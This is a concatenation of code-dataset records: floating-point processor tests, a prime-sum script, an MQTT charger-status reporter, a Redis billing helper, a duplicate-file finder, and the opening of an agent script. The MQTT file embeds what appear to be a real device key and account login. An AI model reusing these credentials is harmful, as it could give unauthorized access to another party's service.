1000000.0), # Second op is lost because of precision\n\t\t\t(0.0000001, 0.00000001, 0x33ec3923), # Very small number \n\t\t\t(1000000.0, 10000000.0, 11000000.0),\t# Very large number\n\t\t\t(-0.0, 2.323, 2.323),\t# negative zero\n\t\t\t(2.323, -0.0, 2.323)\t# negative zero\n\t\t]\n\n\t\tcases = []\n\t\n\t\tregIndex = 0\n\t\tinRegs = {}\n\t\toutRegs = {}\n\t\tcode = ''\n\t\tfor value1, value2, expectedResult in testValues:\n\t\t\toutRegs['t0s' + str(regIndex)] = expectedResult\n\t\t\tinRegs['s' + str(regIndex + 1)] = value1\n\t\t\tinRegs['s' + str(regIndex + 2)] = value2\n\t\t\tcode += 'add_f s'+ str(regIndex) + ', s' + str(regIndex + 1) + ', s' + str(regIndex + 2) + '\\n'\n\t\t\tregIndex += 3\n\t\t\t\n\t\t\tif regIndex == 27:\n\t\t\t\tcases += [ (inRegs, code, outRegs, None, None, None) ]\n\t\t\t\tinRegs = {}\n\t\t\t\toutRegs = {}\n\t\t\t\tcode = ''\n\t\t\t\tregIndex = 0\n\t\n\t\tif regIndex > 0:\n\t\t\tcases += [ (inRegs, code, outRegs, None, None, None) ]\n\t\t\tinRegs = {}\n\t\t\toutRegs = {}\n\t\t\tcode = ''\n\n\t\treturn cases\n\t\n\tdef test_floatingPointScalarCompare():\n\t\ttestValues = [\n\t\t\t(-2.0, 'gt', -3.0, 1),\n\t\t\t(-3.0, 'gt', -2.0, 0),\n\t\t\t(17.0, 'gt', 2.0, 1),\n\t\t\t(2.0, 'gt', 17.0, 0),\n\t\t\t(5.0, 'gt', -17.0, 1),\n\t\t\t(-17.0, 'gt', 5.0, 0),\n\t\t\t(15.0, 'gt', -7.0, 1),\n\t\t\t(-7.0, 'gt', 15.0, 0),\n\t\t\t(-2.0, 'ge', -3.0, 1),\n\t\t\t(-3.0, 'ge', -2.0, 0),\n\t\t\t(17.0, 'ge', 2.0, 1),\n\t\t\t(2.0, 'ge', 17.0, 0),\n\t\t\t(5.0, 'ge', -17.0, 1),\n\t\t\t(-17.0, 'ge', 5.0, 0),\n\t\t\t(15.0, 'ge', -7.0, 1),\n\t\t\t(-7.0, 'ge', 15.0, 0),\n\t\t\t(-5.0, 'ge', -5.0, 1),\n\t\t\t(-2.0, 'lt', -3.0, 0),\n\t\t\t(-3.0, 'lt', -2.0, 1),\n\t\t\t(17.0, 'lt', 2.0, 0),\n\t\t\t(2.0, 'lt', 17.0, 1),\n\t\t\t(5.0, 'lt', -17.0, 0),\n\t\t\t(-17.0, 'lt', 5.0, 1),\n\t\t\t(15.0, 'lt', -7.0, 0),\n\t\t\t(-7.0, 'lt', 15.0, 1),\n\t\t\t(-2.0, 'le', -3.0, 0),\n\t\t\t(-3.0, 'le', -2.0, 1),\n\t\t\t(17.0, 'le', 2.0, 0),\n\t\t\t(2.0, 'le', 17.0, 1),\n\t\t\t(5.0, 'le', -17.0, 0),\n\t\t\t(-17.0, 'le', 5.0, 1),\n\t\t\t(15.0, 'le', -7.0, 0),\n\t\t\t(-7.0, 'le', 15.0, 1),\n\t\t\t(-5.0, 'le', -5.0, 1),\n\t\t\t(float('nan'), 'le', 5.0, 0),\n\t\t\t(5.0, 'le', float('nan'), 0),\n\t\t]\n\t\n\t\tcases = []\n\t\tregIndex = 0\n\t\tinRegs = {}\n\t\toutRegs = {}\n\t\tcode = ''\n\t\tfor 
value1, operator, value2, expectedResult in testValues:\n\t\t\toutRegs['t0s' + str(regIndex)] = 0xffff if expectedResult else 0\n\t\t\tinRegs['s' + str(regIndex + 1)] = value1\n\t\t\tinRegs['s' + str(regIndex + 2)] = value2\n\t\t\tcode += 'set' + operator + '_f s' + str(regIndex) + ', s' + str(regIndex + 1) + ', s' + str(regIndex + 2) + '\\n'\n\t\t\tregIndex += 3\n\t\t\t\n\t\t\tif regIndex == 27:\n\t\t\t\tcases += [ (inRegs, code, outRegs, None, None, None) ]\n\t\t\t\tinRegs = {}\n\t\t\t\toutRegs = {}\n\t\t\t\tcode = ''\n\t\t\t\tregIndex = 0\n\t\n\t\tif regIndex > 0:\n\t\t\tcases += [ (inRegs, code, outRegs, None, None, None) ]\n\t\t\tinRegs = {}\n\t\t\toutRegs = {}\n\t\t\tcode = ''\n\t\t\t\n\t\treturn cases\n\t\n\tdef test_floatingPointVectorCompare():\n\t\tvec1 = [ (random.random() - 0.5) * 10 for x in range(16) ]\n\t\tvec2 = [ (random.random() - 0.5) * 10 for x in range(16) ]\n\t\t\n\t\tgreaterMask = 0\n\t\tlessMask = 0\n\t\tgreaterEqualMask = 0\n\t\tlessEqualMask = 0\n\t\tfor x in range(16):\n\t\t\tgreaterMask |= (0x8000 >> x) if vec1[x] > vec2[x] else 0\n\t\t\tlessMask |= (0x8000 >> x) if vec1[x] < vec2[x] else 0\n\t\t\tgreaterEqualMask |= (0x8000 >> x) if vec1[x] >= vec2[x] else 0\n\t\t\tlessEqualMask |= (0x8000 >> x) if vec1[x] <= vec2[x] else 0\n\t\n\t\treturn ({ \t'v0' : [ x for x in vec1 ],\n\t\t\t\t\t'v1' : [ x for x in vec2 ] },\n\t\t\t'''\n\t\t\t\tsetgt_f s2, v0, v1 \n\t\t\t\tsetlt_f s3, v0, v1\n\t\t\t\tsetge_f s4, v0, v1\n\t\t\t\tsetle_f s5, v0, v1\n\t\t\t''',\n\t\t\t{ \t't0s2' : greaterMask, \n\t\t\t\t't0s3' : lessMask,\t \n\t\t\t\t't0s4' : greaterEqualMask,\t\n\t\t\t\t't0s5' : lessEqualMask }, None, None, None)\t\n\t\t\t\t\n\tdef test_floatingPointRAWDependency():\n\t\treturn ({ 's1' : 7.0, 's2' : 11.0, 's4' : 13.0 }, '''\n\t\t\tadd_f s0, s1, s2\n\t\t\tadd_f s3, s0, s4\n\t\t''', { 't0s0' : 18.0, 't0s3' : 31.0 }, None, None, None)\n\n\tdef test_infAndNanAddition():\n\t\tPOS_INF = float('inf')\n\t\tNEG_INF = -float('inf')\n\t\tNAN = float('nan')\n\n\t\treturn ({ 's1' : POS_INF, 's2' : NEG_INF, 's3' : NAN, 's4' : 3.14 }, '''\n\t\t\tadd_f s5, s1, s1\n\t\t\tadd_f s6, s1, s2\n\t\t\tadd_f s7, s2, s2\n\t\t\tadd_f s8, s2, s1\n\t\t\t\n\t\t\tsub_f s9, s1, s1\n\t\t\tsub_f s10, s1, s2\n\t\t\tsub_f s11, s2, s2\n\t\t\tsub_f s12, s2, s1\n\n\t\t\tadd_f s13, s4, s1\n\t\t\tadd_f s14, s4, s2\n\t\t\tadd_f s15, s4, s3\n\n\t\t\tadd_f s16, s1, s4 \n\t\t\tadd_f s17, s2, s4\n\t\t\tadd_f s18, s3, s4\n\n\t\t\tsub_f s19, s4, s1\n\t\t\tsub_f s20, s4, s2\n\t\t\tsub_f s21, s4, s3\n\n\t\t\tsub_f s22, s1, s4 \n\t\t\tsub_f s23, s2, s4\n\t\t\tsub_f s24, s3, s4\n\t\t''', { \n\t\t\t't0s5' : POS_INF + POS_INF,\n\t\t\t't0s6' : POS_INF + NEG_INF,\n\t\t\t't0s7' : NEG_INF + NEG_INF,\n\t\t\t't0s8' : NEG_INF + POS_INF,\n\n\t\t\t't0s9' : POS_INF - POS_INF,\n\t\t\t't0s10' : POS_INF - NEG_INF,\n\t\t\t't0s11' : NEG_INF - NEG_INF,\n\t\t\t't0s12' : NEG_INF - POS_INF,\n\n\t\t\t't0s13' : 3.14 + POS_INF,\n\t\t\t't0s14' : 3.14 + NEG_INF,\n\t\t\t't0s15' : 3.14 + NAN,\n\n\t\t\t't0s16' : POS_INF + 3.14,\n\t\t\t't0s17' : NEG_INF + 3.14,\n\t\t\t't0s18' : NAN + 3.14,\n\n\t\t\t't0s19' : 3.14 - POS_INF,\n\t\t\t't0s20' : 3.14 - NEG_INF,\n\t\t\t't0s21' : 3.14 - NAN,\n\n\t\t\t't0s22' : POS_INF - 3.14,\n\t\t\t't0s23' : NEG_INF - 3.14,\n\t\t\t't0s24' : NAN - 3.14\n\t\t}, None, None, None)\n\t\t\n\tdef test_infAndNanMultiplication():\n\t\tPOS_INF = float('inf')\n\t\tNEG_INF = -float('inf')\n\t\tNAN = float('nan')\n\n\t\treturn ({ 's1' : POS_INF, 's2' : NEG_INF, 's3' : NAN, 's4' : 1.0 }, '''\n\t\t\tmul_f s5, s1, s1\n\t\t\tmul_f s6, s1, 
s2\n\t\t\tmul_f s7, s2, s2\n\t\t\tmul_f s8, s2, s1\n\t\t\t\n\t\t\tmul_f s9, s4, s1\n\t\t\tmul_f s10, s4, s2\n\t\t\tmul_f s11, s4, s3\n\n\t\t\tmul_f s12, s1, s4 \n\t\t\tmul_f s13, s2, s4\n\t\t\tmul_f s14, s3, s4\n\t\t''', { \n\t\t\t't0s5' : POS_INF * POS_INF,\n\t\t\t't0s6' : POS_INF * NEG_INF,\n\t\t\t't0s7' : NEG_INF * NEG_INF,\n\t\t\t't0s8' : NEG_INF * POS_INF,\n\n\t\t\t't0s9' : 1.0 * POS_INF,\n\t\t\t't0s10' : 1.0 * NEG_INF,\n\t\t\t't0s11' : 1.0 - NAN,\n\n\t\t\t't0s12' : POS_INF * 1.0,\n\t\t\t't0s13' : NEG_INF * 1.0,\n\t\t\t't0s14' : NAN * 1.0,\n\t\t}, None, None, None)\t\t\n\t\t\n\t\t\n\tdef test_floatingPointMultiplication():\n\t\treturn ({ 's1' : 2.0, \n\t\t\t's2' : 4.0, \n\t\t\t's5' : 27.3943, \n\t\t\t's6' : 99.382,\n\t\t\t's8' : -3.1415,\n\t\t\t's9' : 2.71828,\n\t\t\t's11' : -1.2,\n\t\t\t's12' : -2.3,\n\t\t\t's14' : 4.0,\n\t\t\t's15' : 0.001,\n\t\t\t's17'\t: 0.0,\n\t\t\t's18'\t: 19.4\n\t\t\t}, '''\n\t\t\tmul_f s3, s1, s2\n\t\t\tmul_f s4, s5, s6\n\t\t\tmul_f s7, s8, s9\n\t\t\tmul_f s10, s11, s12\n\t\t\tmul_f s13, s14, s15\n\t\t\tmul_f s16, s17, s18\t\t; zero identity\n\t\t\tmul_f s19, s18, s17\t\t; zero identity (zero in second position)\n\t\t''', { \n\t\t\t't0s3' : 8.0, \n\t\t\t't0s4' : 2722.5003226,\n\t\t\t't0s7' : -8.53947662,\n\t\t\t't0s10' : 2.76,\n\t\t\t't0s13' : 0.004,\n\t\t\t't0s16' : 0.0,\n\t\t\t't0s19' : 0.0\n\t\t}, None, None, None)\n\t\t\n\tdef test_itof():\n\t\treturn ({ 's1' : 12, \n\t\t\t\t's5' : -123, \n\t\t\t\t's7' : 23 },\n\t\t\t'''\n\t\t\t\titof s3, s1\t\n\t\t\t\titof s4, s5\n\t\t\t\titof s6, s7\n\t\t\t''',\n\t\t\t{ \t't0s3' : 12.0,\n\t\t\t \t't0s4' : -123.0,\n\t\t\t \t't0s6' : 23.0\n\t\t\t}, None, None, None)\n\n\tdef test_ftoi1():\n\t\treturn ({ 's1' : 12.981, \n\t\t\t\t's5' : -123.0, \n\t\t\t\t's7' : 23.0 },\n\t\t\t'''\n\t\t\t\tftoi s3, s1\t\n\t\t\t\tftoi s4, s5\n\t\t\t\tftoi s6, s7\n\t\t\t''',\n\t\t\t{ 't0s3' : 12,\n\t\t\t \t't0s4' : -123,\n\t\t\t \t't0s6' : 23\n\t\t\t}, None, None, None)\n\t\n\tdef test_ftoi2():\n\t\treturn ({ 's1': 0.00009, 's2' : 0.0 },\n\t\t'''\n\t\t\tftoi s4, s1\t; Result will be zero because of very small exponent. \n\t\t\t\t\t\t\t; Make sure we shift in zeros properly (regression test).\n\n\t\t\tftoi s5, s2\t; Actually zero\n\t\t''', { 't0s4' : 0, 't0s5' : 0, 't0s6' : 0 }, None, None, None)\n\n\tdef test_reciprocal1():\n\t\treturn ({ \n\t\t\t's0' : 12345.0, \n\t\t\t's1' : 4.0,\n\t\t\t's2' : +0.0,\n\t\t\t's3' : -0.0,\n\t\t\t's4' : float('inf'),\n\t\t\t's5' : -float('inf'),\n\t\t\t's6' : float('nan')\n\t\t}, '''\n\t\t\treciprocal s8, s0\t\t; divide by normal number\n\t\t\treciprocal s9, s1\t\t; significand is zero, special case\n\t\t\treciprocal s10, s2\t; divide by plus zero, +inf\n\t\t\treciprocal s11, s3\t; divide by minus zero, -inf\n\t\t\treciprocal s12, s4\t; divide by +inf, result is +0\n\t\t\treciprocal s13, s5\t; divide by -inf, result is -0\n\t\t\treciprocal s14, s6\t; divide by NaN, result is NaN\n\t\t''', { \n\t\t\t't0s8' : 0x38aa0000, \n\t\t\t't0s9' : 0.25, \n\t\t\t't0s10' : float('inf'),\n\t\t\t't0s11' : -float('inf'),\n\t\t\t't0s12' : +0.0,\n\t\t\t't0s13' : -0.0,\n\t\t\t't0s14' : float('nan')\n\t\t }, None, None, None)\n\t\n\tdef test_reciprocal2():\n\t\treturn ({ 's0' : 123.0, 's1' : 2.0 }, '''\n\t\t\treciprocal s2, s0\n\n\t\t\t; newton raphson refinement\n\t\t\tmul_f s3, s2, s0\t\t; Multiply x by est. 
of 1/x (ideally should be 1.0)\n\t\t\tsub_f s3, s1, s3\t\t; 2.0 - estimate returns the error\n\t\t\tmul_f s2, s3, s2\t\t; update estimate\n\n\t\t\tmul_f s3, s2, s0\t\t; One more iteration\n\t\t\tsub_f s3, s1, s3\n\t\t\tmul_f s2, s3, s2\n\t\t\n\t\t''', { 't0s2' : 0x3c053407, 't0s3' : None }, None, None, None )\n\t\t\t\n\tdef test_mulOverUnderflow():\n\t\treturn ({ 's1' : float('1e20'), 's2' : float('1e-20') },\n\t\t\t'''\n\t\t\t\tmul_f s3, s1, s1\t; overflow\n\t\t\t\tmul_f s4, s2, s2\t; underflow\n\t\t\t''',\n\t\t\t{ \t\n\t\t\t\t't0s3' : float('inf'),\n\t\t\t\t't0s4' : 0.0\n\t\t\t}, None, None, None)\n\t\t\t\n","sub_path":"tests/directed_verification/fp_test.py","file_name":"fp_test.py","file_ext":"py","file_size_in_byte":9897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"129163349","text":"from math import *\r\nimport time\r\n\r\ns = time.time()\r\n'''\r\ndef is_prime(number):\r\n if number == 2:\r\n return True\r\n else:\r\n sqrt_nr = ceil(sqrt(number))\r\n i = 2;\r\n while i <= sqrt_nr:\r\n if not(number % i):\r\n return False\r\n i = incr(i)\r\n return True\r\n\r\ndef incr(i):\r\n if i <= 2:\r\n return i + 1\r\n elif i > 5 and i % 6 == 1:\r\n return i + 4\r\n else:\r\n return i + 2\r\n\r\ndef find_next_prime(prime):\r\n prime = incr(prime)\r\n while not is_prime(prime):\r\n prime = incr(prime)\r\n return prime\r\n\r\n#prime_list = [is_prime(i) for i in range(30)]\r\n#print (prime_list)\r\n\r\n\r\n\r\ni=2\r\nprime=3;\r\nsum = 5\r\nwhile prime < 2000000:\r\n prime = find_next_prime(prime)\r\n sum += prime\r\n i = i + 1\r\nprint (prime)\r\nprint (time.time() -s)\r\n\r\n# project euler 10 - sum of primes\r\n\r\nsum = 2\r\nprime = 3\r\nwhile prime < 500000:\r\n sum += prime\r\n prime = find_next_prime(prime)\r\nprint (sum)\r\nprint (time.time() -s)\r\n'''\r\n#### A faster solution?? 
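Several expected values in the fp_test.py record above are written as raw bit patterns such as 0x423247ad rather than as floats. For readers checking those constants, Python's struct module converts between a float and its IEEE-754 single-precision pattern; these helpers are my illustration and are not part of the test suite.

import struct

def float_to_bits(f):
    """32-bit big-endian IEEE-754 pattern of a float."""
    return struct.unpack(">I", struct.pack(">f", f))[0]

def bits_to_float(b):
    """Inverse of float_to_bits."""
    return struct.unpack(">f", struct.pack(">I", b))[0]

print(hex(float_to_bits(4.0)))           # 0x40800000
print(bits_to_float(0x423247ad))         # ~44.57, the 0.34 + 44.23 case
print(hex(float_to_bits(float("inf"))))  # 0x7f800000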
- uses a sieve method\r\n\r\nmarked = [0] * 1000000\r\nvalue = 3\r\ns = 2\r\nwhile value < 1000000:\r\n if marked[value] == 0:\r\n s += value\r\n i = value\r\n while i < 1000000:\r\n marked[i] = 1\r\n i += value\r\n value += 2\r\nprint (s)\r\n\r\n","sub_path":"old_solutions/primefinder.py","file_name":"primefinder.py","file_ext":"py","file_size_in_byte":1301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"307271700","text":"import sys\n\nwith open(sys.argv[1], 'r') as f:\n\tfor line in f:\n\t\tline = line.strip()\n\t\tif line[0] == '#':\n\t\t\tprint(line)\n\t\telse:\n\t\t\tdata = line.split('\\t')\n\t\t\tdata[1] = str(int(sys.argv[2]) + int(data[1]))\n\t\t\tprint('\\t'.join(data))\n","sub_path":"coordinate_conversion.py","file_name":"coordinate_conversion.py","file_ext":"py","file_size_in_byte":231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"432843284","text":"# 样本,不是必要包\nimport time,hashlib\nimport paho.mqtt.client as mqtt\nfrom Activemq.getbrokerfordevice import getBrokerForDevice\nimport constant.site as site\nclass ReportStatus():\n def __init__(self,SN='C201170803IXMDQIJD',auth_key='015c6f4b1af4ef39a7a4ab30ff4c31d4'):\n self.SN = SN\n src = SN + \"1\" + \"2\" + auth_key\n m2 = hashlib.md5()\n m2.update(src.encode(\"utf-8\"))\n self.pwd = \"1_\" + \"2_\" + m2.hexdigest()\n self.message = ''\n self.hostname = getBrokerForDevice()\n def ReportNetworkStatus(self,func,*args,**kwargs):\n '''上报设备联��,连接设备之后,设置定时充电'''\n def on_connect(client, userdata, flags, rc):\n #print(\"Connected with result code \" + str(rc))\n client.subscribe(\"cmf/\" + self.SN, 1)\n client.publish(\"VirtualTopic/dmf/\" + self.SN,\"ReportNetworkStatus v1.0 996945745882812416\\n{\\\"online\\\":true}\")\n time.sleep(1)\n def on_message(client, userdata, msg):\n print(msg.topic + \" \" + str(msg.payload))\n def on_pushlish(client, userdata, mid):\n # print(\"send message success\" + str(mid))\n pass\n client = mqtt.Client(self.SN)\n client.username_pw_set(self.SN, self.pwd)\n client.on_publish = on_pushlish\n client.on_connect = on_connect\n client.on_message = on_message\n client.connect(self.hostname, 61613, 60)\n client.loop_start()\n time.sleep(1)\n client.loop_stop()\n return func(*args,**kwargs)\n\nif __name__ == \"__main__\":\n from Xcharger.SiteDetails.device_config import DeviceConfiguration\n import requests\n s = requests.session()\n dcf = DeviceConfiguration(s)\n dcf.login('zhichong','xcharger88')\n report = ReportStatus()\n devicelist = [{\"id\": \"918846221735563264\", \"port\": \"1\"}]\n Ctime23 = [\n {\n 'startTime': '23:30',\n 'power': ''\n }\n ]\n res = report.ReportNetworkStatus(dcf.ChargeringTime,devicelist,Ctime23)\n print(res.json())","sub_path":"Activemq/ReportNetworkStatus.py","file_name":"ReportNetworkStatus.py","file_ext":"py","file_size_in_byte":2062,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"203777802","text":"# coding=utf-8\nimport time\nimport json\nfrom redis_model.redis_client import *\n\n\nclass RoomRedis(object):\n\n __KEY_PREFIX__ = \"room_\"\n\n __KEY_USER_ID__ = \"user_id\"\n __KEY_JOIN_ID__ = \"join_id\"\n __KEY_START_TIME__ = \"start_time\"\n __KEY_BILL_TIME__ = \"bill_time\"\n @classmethod\n def create_room_record(cls, room_id, user_id, join_id):\n dic = {}\n dic[cls.__KEY_START_TIME__] = int(time.time())\n dic[cls.__KEY_USER_ID__] = user_id\n dic[cls.__KEY_JOIN_ID__] = join_id\n 
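The primefinder.py record earlier in this chunk ends with a hand-rolled odd-only sieve. For comparison, a standard Sieve of Eratosthenes with slice assignment solves the same Project Euler problem 10 (sum of primes below two million) in a few lines; this version is my sketch, not from the record.

def sum_primes_below(limit):
    """Sum of all primes p < limit via the Sieve of Eratosthenes."""
    if limit < 3:
        return 0
    is_prime = bytearray([1]) * limit
    is_prime[0] = is_prime[1] = 0
    for p in range(2, int(limit ** 0.5) + 1):
        if is_prime[p]:
            # start crossing off at p*p; smaller multiples are already handled
            is_prime[p * p::p] = bytearray(len(range(p * p, limit, p)))
    return sum(i for i, flag in enumerate(is_prime) if flag)

print(sum_primes_below(2_000_000))  # 142913828922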
RQueueClient.getInstance().redis.set(cls.__KEY_PREFIX__ + room_id, json.dumps(dic), nx=True)\n\n @classmethod\n def get_room_record(cls, room_id):\n room_record = RQueueClient.getInstance().redis.get(cls.__KEY_PREFIX__ + room_id)\n return json.loads(room_record)\n\n\n @classmethod\n def room_paybill(cls, room_id):\n room_record = RQueueClient.getInstance().redis.get(cls.__KEY_PREFIX__ + room_id)\n room_dic = json.loads(room_record)\n bill_time = room_dic.get(cls.__KEY_BILL_TIME__)\n if bill_time:\n room_dic[cls.__KEY_BILL_TIME__] = int(time.time())\n total_seconds = int(time.time()) - bill_time\n RQueueClient.getInstance().redis.set(cls.__KEY_PREFIX__ + room_id, json.dumps(room_dic), xx=True)\n if total_seconds >= 55:\n return (total_seconds + 5) / 60\n else:\n return 0\n else:\n room_dic[cls.__KEY_BILL_TIME__] = int(time.time())\n RQueueClient.getInstance().redis.set(cls.__KEY_PREFIX__ + room_id, json.dumps(room_dic), xx=True)\n return 1\n\n @classmethod\n def close_room(cls, room_id):\n RQueueClient.getInstance().redis.delete(cls.__KEY_PREFIX__ + room_id)\n","sub_path":"app_redis/room/room.py","file_name":"room.py","file_ext":"py","file_size_in_byte":1755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"493470610","text":"# dupFinder.py\nimport os\nimport sys\nimport hashlib\nimport argparse\nimport winsound\nimport platform\nimport subprocess\nfrom send2trash import send2trash\nimport tkinter as tk\nfrom tkinter import filedialog\n\nBLOCK_SIZE = 65536\nCHAR_KONST = 97\n\n# file extensions to skipp, no .\nSKIPP = [\"asd\", \"txt\", \"png\", \"jpg\"]\n\ncols, rows = os.get_terminal_size()\n\n# cli arguments\nargparser = argparse.ArgumentParser(description=\"Find doublicate files, give one or more paths as arguments \\nUsage: python dupPy.py -p folder1 folder2 <...>\")\nargparser.add_argument(\"-p\", \"--path\", type=str, nargs=\"+\", dest=\"paths\", help=\"give one or more paths to dirs \\nexample: -p \\\"I:\\\\example\\\\dir\\\\...\\\\...\\\"\")\nargparser.add_argument(\"-td\", \"--topdown\", action=\"store_true\", dest=\"topdown\", help=\"add '-r' to scan topdown\")\nargparser.add_argument(\"-fl\", \"--links\", action=\"store_true\", dest=\"followlinks\", help=\"add '-f' to follow symlinks\")\nargparser.add_argument(\"-pl\", \"--play\", action=\"store_true\", dest=\"player\", help=\"add '-pl' or '--play' flag to have play dialog\")\nargparser.add_argument(\"-rm\", \"--remove\", action=\"store_true\", dest=\"rem\", help=\"add '-r' or '--remove' flag to enable remove dialog\")\nargparser.add_argument(\"-s\", \"--strategy\", action=\"store_true\", dest=\"strat\", help=\"add '-s' or '--strategy' flag to ask for restart after removing a file\")\nargparser.add_argument(\"-sf\", \"--save-file\", action=\"store_true\", dest=\"tofile\", help=\"add '-sf' or '--save-file' flag to save to a file\")\nargparser.add_argument(\"-g\", \"--gui\", action=\"store_true\", dest=\"gui\", help=\"add '-g' or '--gui' flag to open chose dir dialog\")\nargparser.add_argument(\"-ar\", \"--auto-remove\", action=\"store_true\", dest=\"frem\", help=\"add flag to remove second dublicate atomatically\")\n\nargs, unknown = argparser.parse_known_args()\n\ndef gui_get_path():\n \"\"\"\n Gui to ask for target dir\n :return: selceted dir\n \"\"\"\n root = tk.Tk()\n root.withdraw()\n sdir = filedialog.askdirectory()\n # print(type(sdir))\n return sdir\n\n# play file with winsound\ndef play(file):\n \"\"\"\n play file with winsound or open it\n \"\"\"\n print(\"[>] 
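In the room.py record above, room_paybill() computes billable minutes as (total_seconds + 5) / 60. The record reads as Python 2 code, where "/" on integers floor-divides; under Python 3 the same expression yields a float, so a port should use "//". A self-contained version of just the rounding rule (my sketch):

def minutes_to_bill(total_seconds):
    """Bill whole minutes; 55+ seconds round up to the next minute."""
    if total_seconds < 55:
        return 0
    return (total_seconds + 5) // 60

for secs in (30, 55, 60, 115, 120):
    print(secs, "->", minutes_to_bill(secs))
# 30 -> 0, 55 -> 1, 60 -> 1, 115 -> 2, 120 -> 2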
playing: \\t{}...\".format(file))\n if platform.system() == \"Windows\":\n winsound.PlaySound(file, winsound.SND_FILENAME)\n else:\n sysPlay(file)\n\n# open file with shell\ndef sysPlay(file):\n print(\"[d] sysPlay: {}\".format(file))\n subprocess.call(\"\\\"{}\\\"\".format(file), shell=True)\n\ndef findDup(parentFolder):\n # Dups in format {hash:[names]}\n if args.topdown:\n print(\"[I] using topdown method\")\n t = True\n else:\n t = False\n if args.followlinks:\n print(\"[I] including sym-links\")\n f = True\n else:\n f = False\n # start scanning:\n dups = {}\n for dirName, subdirs, fileList in os.walk(parentFolder, topdown=t, followlinks=f):\n print(\"[i] Scanning: {}...\\r\".format(dirName), end=\"\")\n for filename in fileList:\n # skipp files\n # print(filename.split(\".\")[-1] in SKIPP)\n if filename.split(\".\")[-1] in SKIPP:\n continue\n # Get the path to the file\n path = os.path.join(dirName, filename)\n # Calculate hash\n file_hash = hashfile(path)\n # Add or append the file path\n if file_hash in dups:\n dups[file_hash].append(path)\n else:\n dups[file_hash] = [path]\n return dups\n\n# Joins two dictionaries\ndef joinDicts(dict1, dict2):\n for key in dict2.keys():\n if key in dict1:\n dict1[key] = dict1[key] + dict2[key]\n else:\n dict1[key] = dict2[key]\n \n# hash the file\ndef hashfile(path, blocksize = BLOCK_SIZE):\n afile = open(path, \"rb\")\n hasher = hashlib.md5()\n buf = afile.read(blocksize)\n while len(buf) > 0:\n hasher.update(buf)\n buf = afile.read(blocksize)\n afile.close()\n return hasher.hexdigest()\n \n# returns result array with pairs\ndef createResults(dict1):\n return list(filter(lambda x: len(x) > 1, dict1.values()))\n\ndef playResult(result):\n try:\n if len(result) > 1:\n p = True\n while p:\n a = ord(input(\"[?] wich one to play? (a/b/c/...) \")) - CHAR_KONST\n if a <= len(result) - 1 and a >= 0:\n if(result[a].endswith(\".wav\")):\n play(result[a])\n else:\n print(\"[e] the file is not playable...\")\n if(input(\"[?] do you want to open the file in the explorer? (y/n) \") == \"y\"):\n print(\"[i] opening in explorer...\")\n subprocess.Popen(\"explorer /select, \\\"{}\\\"\".format(result[a]))\n else:\n continue\n p = True\n else:\n p = False\n if(args.rem):\n r = ord(input(\"[?] wich one do you want to delete? (a/b/c/...) \")) - CHAR_KONST\n if r <= len(result) - 1 and r >= 0:\n if(os.path.isfile(result[r])):\n print(\"[i] removing: {}\".format(result[r]))\n send2trash(result[r])\n else:\n print(\"[e] {} ist not a valid file\".format(result[r]))\n if(args.strat):\n if(input(\"[?] do you want to restart? (y/n) \") == \"y\"):\n return True\n else:\n return False\n except TypeError:\n print(\"[E] TypeError...\")\n return True\n\ndef showResults(results):\n if len(results) > 0:\n c = 0\n print(\"\\n\\n[A] Duplicates Found: {}\".format(len(results)))\n print(\"[>] The following files are identical. 
The name could differ, but the content is identical\")\n for result in results:\n ch = 'a'\n print(\"_\" * cols)\n print(\"Nr: {}\\t{} duplicates...\".format(c, len(result)))\n for subresult in result:\n # if subresult == \"DS_Store\":\n print('{}) \\t{}' .format(ch ,subresult))\n ch = chr(ord(ch) + 1)\n print(\"_\" * cols)\n c += 1\n if args.frem and not args.player and not args.rem and not args.strat:\n print(\"[i] removing second...\")\n send2trash(result[-1])\n elif args.player:\n if(args.player):\n if playResult(result):\n return True\n else:\n continue\n else:\n print(\"[e] dont use '-ao' flag with '-pl' '-rm' and '-s' flags\")\n # continue\n else:\n print('[A] No duplicate files found.')\n return False\n\ndef toFile(results):\n \"\"\"\n writes results to a file\n \"\"\"\n c = 1\n with open(\"results.txt\", \"w\") as f:\n f.write(\"[>] We found {} doublicate files\\n\".format(len(results)))\n for result in results:\n ch = 'a'\n f.write(\"{}\\n\".format(\"_\" * cols))\n f.write(\"[i] Nr: {}\\t{} duplicates...\\n\".format(c, len(result)))\n for subresult in result:\n f.write(\"\\t{}) \\t{}\\n\" .format(ch ,subresult))\n ch = chr(ord(ch) + 1)\n f.write(\"{}\\n\".format(\"_\" * cols))\n c += 1\n\ndef main():\n folders = []\n if args.paths and not args.gui:\n print(\"[I] starting scan. quit with [ctrl + c]\")\n folders = args.paths\n elif args.gui and not args.paths:\n folders.append(gui_get_path())\n else:\n print(\"[E] plese use '-p' or '-g' not both at once\")\n folders = False\n if folders:\n e = True\n while e:\n try:\n dups = {}\n for i in folders:\n if os.path.exists(i):\n joinDicts(dups, findDup(i))\n else:\n print(\"[e] {} is not a valid path, please verify\".format(i))\n sys.exit()\n results = createResults(dups)\n if(args.tofile):\n toFile(results)\n e = showResults(results)\n except KeyboardInterrupt:\n print(\"\\n[e] KeyboardInterrupt exit programm...\")\n sys.exit(2)\n else:\n print(\"[e] no paths given...\")\n sys.exit(-1)\n \nif __name__ == \"__main__\":\n main()","sub_path":"dubPy lite.py","file_name":"dubPy lite.py","file_ext":"py","file_size_in_byte":8431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"547880747","text":"# testing ....\n\n\n'''\n智能体与环境交互的基本流程\n\n整体分为四部分: 参数读入与初始化, 环境交互, 记忆重构, 参数训练\n\n用a2c实现对比策略\n'''\n\nimport numpy as np \nfrom six.moves import range\nfrom six.moves import zip\nfrom absl import app\nfrom absl import flags\nfrom envs.tpycolab import tenv as pycolab_env\nimport GBMRagent\nimport tensorflow as tf\nimport tensorflow.keras as keras\nimport tensorflow.keras.layers as layers\nimport gym\nimport logging\n\n'''\n超参数读入:环境相关,流程相关,智能体相关\n'''\nFLAGS = 